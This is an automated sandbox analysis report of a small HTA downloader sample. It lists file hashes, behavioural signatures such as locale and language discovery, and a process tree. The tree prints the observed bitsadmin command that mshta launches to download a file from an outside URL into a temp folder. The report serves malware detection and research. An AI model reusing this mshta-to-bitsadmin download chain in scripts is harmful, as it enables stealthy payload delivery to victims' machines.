Analysis
- max time kernel: 131s
- max time network: 205s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 28-08-2024 15:13
Static task: static1
Behavioral task: behavioral1
- Sample: Downloader.hta
- Resource: win7-20240708-en
- 5 signatures
- 300 seconds
General
- Target: Downloader.hta
- Size: 828B
- MD5: 05a34f1fc75cc308ee7dd8a6dc3e4076
- SHA1: eda4d95a33dde083ede19f8d9d4099764fa1a326
- SHA256: a536c510d65bb3cfd573a05e0107ab46f427f804431970ecb18c7f173a9ccafd
- SHA512: f02ddc254688bd5a4e069203f34fdffbc3905dc446aaed3578fa6f574e955788cb5416ee15bfb5acab970249c6c7563a6ef903cac4189bcc937ac9072f6c4612
Malware Config
Signatures
- Download via BitsAdmin (1 TTPs, 1 IoCs)
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes: mshta.exe
  description: Key value queried; ioc: \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation; process: mshta.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTPs, 2 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Processes: mshta.exe, bitsadmin.exe
  description: Key opened; ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language; process: mshta.exe
  description: Key opened; ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language; process: bitsadmin.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: mshta.exe
  description: PID 3368 wrote to memory of 2984; pid: 3368; process: mshta.exe; target process: bitsadmin.exe
  description: PID 3368 wrote to memory of 2984; pid: 3368; process: mshta.exe; target process: bitsadmin.exe
  description: PID 3368 wrote to memory of 2984; pid: 3368; process: mshta.exe; target process: bitsadmin.exe
Processes
- C:\Windows\SysWOW64\mshta.exe (PID 3368)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  - Child process: C:\Windows\SysWOW64\bitsadmin.exe (PID 2984)
    Command line: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://go.enderman.ch/youtube C:\Users\Admin\AppData\Local\Temp\sex
    - Download via BitsAdmin
    - System Location Discovery: System Language Discovery